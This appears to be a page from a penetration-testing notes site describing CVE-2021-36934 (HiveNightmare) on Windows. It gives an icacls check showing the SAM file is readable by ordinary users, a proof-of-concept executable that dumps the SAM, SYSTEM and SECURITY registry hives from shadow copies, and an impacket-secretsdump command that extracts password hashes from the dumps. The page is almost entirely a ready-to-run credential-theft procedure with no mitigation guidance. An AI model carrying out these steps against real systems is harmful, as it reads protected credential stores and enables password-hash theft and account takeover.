CVE-2021-36934 HiveNightmare

1 - Check if target is vulnerable

C:\hacker> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

We are vulnerable since the file is readable by BUILTIN\Users

Successful exploitation also requires the presence of one or more shadow copies (snaphsots). Most Windows 10 systems have System Protection enabled by default which creates shadow copies.

2 - Dump Registry Hives

This PoC can be used:

.\HiveNightmare.exe

3 - Extract Hashes from dump

From a linux host:

impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local

PreviousEnumerating Missing Patches NextCVE-2021-1675/34527 PrintNightmare

Last updated 2 years ago

hashtag1 - Check if target is vulnerable

hashtag2 - Dump Registry Hives

hashtag3 - Extract Hashes from dump

1 - Check if target is vulnerable

2 - Dump Registry Hives

3 - Extract Hashes from dump